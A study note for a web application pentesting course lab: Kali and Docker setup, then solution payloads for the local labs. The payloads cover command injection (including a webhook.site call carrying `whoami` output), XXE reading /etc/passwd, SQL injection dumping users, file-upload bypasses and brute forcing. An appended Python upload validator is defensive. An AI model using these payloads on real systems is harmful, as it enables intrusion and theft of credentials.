# Web App Lab Setup

> **Lab Requirements**
>
> * 1 Kali Linux VM
> * [pimpmykali](https://github.com/Dewalt-arch/pimpmykali/blob/master/pimpmykali.sh)
>   * (optional) [peh-web-labs.tar.gz](https://cdn.fs.teachablecdn.com/CbIyLkOuS4GUH7TNFTFg)
> * [Burp Suite](https://portswigger.net/burp/releases)

* Run `pimpmykali.sh` with `E` selection for **PEH Course WebApp Labs**

```bash
# Clone the GitHub repository into the "/opt" dir
cd /opt
sudo rm -rf pimpmykali/
sudo git clone https://github.com/Dewalt-arch/pimpmykali

sudo /opt/pimpmykali/pimpmykali.sh
# Run menu option E for the WebApp Labs
# The labs start automatically

# To START the labs
cd $HOME/peh/labs
./start-peh-labs.sh

# To (only) STOP the labs
sudo docker stop $(sudo docker ps -aq)

# To STOP and CLEANUP the labs
cd $HOME/peh/labs
./cleanup-peh-labs.sh
# This script removes ALL DOCKER CONTAINERS and NETWORKS!!!
```

* Run Burp Suite and open its proxy browser
* Browse to `http://localhost`
* The database can be initialized/reset at `http://localhost/init.php`

***

> ## Lab solutions
>
> ### Command Inj 0x02
>
> `https://tcm-sec.com/& whoami& asd`
>
> `https://tcm-sec.com/ | sleep 10 | asd`
>
> `` https://webhook.site/<id>/?`whoami` ``
>
> ### Command Inj 0x03
>
> `45123)^2))}';whoami;#`
>
> ### File upload 0x01
>
> * Intercept
> * Change contents
> * Or turn off JS
>
> ### File upload 0x02
>
> * Bypass the client-side again
> * Intercept and change the content-type to image/png or image/jpeg
>
> ### File upload 0x03
>
> * Bypass the client-side again
> * Intercept and change the content-type again
> * Use an extension that's not in the blocklist (.phtml)
>
> ### Authentication 0x01
>
> * Brute force
>
> ### Authentication 0x02
>
> * MFA code, switch username (code is OK for all users)
> * Or, just brute the code
>
> ### Authentication 0x03
>
> * Account lockout after 5 attempts, therefore brute the top 4 passwords against a username list
> * common password list:
>
> ```
> password
> password123
> letmein
> manchesterunited
> ```
>
> * common usernames list: `/usr/share/seclists/Usernames/Names/names.txt`
>
> ### XXE, IDOR, capstone
>
> #### XXE 0x01
>
> ```xml
> <?xml version="1.0" encoding="UTF-8"?>
> <!DOCTYPE creds [
> <!ELEMENT creds ANY >]>
> <creds><user>username</user><password>pass</password></creds>
> ```
>
> ```xml
> <?xml version="1.0" encoding="UTF-8"?>
> <!DOCTYPE creds [
> <!ELEMENT creds ANY >
> <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
> <creds><user>&xxe;</user><password>pass</password></creds>
> ```
>
> #### IDOR
>
> `fuzz the parameter`
>
> * find an admin user (or all of the admin users)
>
> #### Capstone
>
> SQLi to get into the admin panel, then file upload to get RCE
>
> * XSS in the message alert
> * XSS in account names probably? need to test
> * brute force user accounts
> * SQLi on adding rating
>
> `http://localhost/capstone/coffee.php?coffee=3' or 1=1-- -`
>
> `http://localhost/capstone/coffee.php?coffee=1%27%20union%20select%20null,username,password,null,null,null,null%20from%20users--%20-`
>
> ## To do list
>
> * file upload capstone
> * auth0x03 testing
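
As an added example (not code from the original page or the course labs), a Python server-side upload check that closes the three bypasses used in the File upload 0x01 to 0x03 notes above: it does not depend on client-side validation, never trusts the client-supplied Content-Type, uses an extension allowlist instead of a blocklist (so `.phtml` is rejected), and verifies the file's magic bytes. The function name, allowlist and sample payloads are constructed for illustration.

```python
import os
import re

# Allowlist of extensions and the magic bytes each must start with.
# A blocklist (.php, .php5, ...) is what lets ".phtml" through in lab 0x03;
# an allowlist rejects anything not explicitly permitted.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}
# Filename stem restricted to a safe character set (constructed policy).
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def check_upload(filename: str, client_content_type: str, data: bytes):
    """Return (accepted, reason).

    Only the file bytes and the final extension are trusted. The client-supplied
    Content-Type (spoofed to image/png in lab 0x02) is attacker-controlled, so a
    mismatch is only noted for logging and never used as evidence of safety.
    """
    base = os.path.basename(filename)  # drop any path components
    if base.count(".") != 1:           # reject "shell.php.png" style names
        return False, "exactly one extension required"
    stem, ext = base.rsplit(".", 1)
    ext = ext.lower()
    if ext not in ALLOWED:             # allowlist, not blocklist
        return False, f"extension .{ext} not allowed"
    if not SAFE_NAME.match(stem):
        return False, "unsafe characters in filename"
    if not data.startswith(ALLOWED[ext]):  # content must match the extension
        return False, "file content does not match extension"
    ct_mismatch = client_content_type not in ("image/png", "image/jpeg")
    return True, ("ok (content-type mismatch logged)" if ct_mismatch else "ok")


if __name__ == "__main__":
    # Constructed samples: a real PNG header and a PHP-looking text file.
    png = b"\x89PNG\r\n\x1a\n" + bytes(8)
    php = b"<?php /* constructed sample */ ?>"
    for name, ct, body in [("pic.png", "image/png", png),
                           ("shell.phtml", "image/png", php),
                           ("pic.png", "image/png", php),
                           ("shell.php.png", "image/png", png)]:
        print(name, ct, check_upload(name, ct, body))
```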
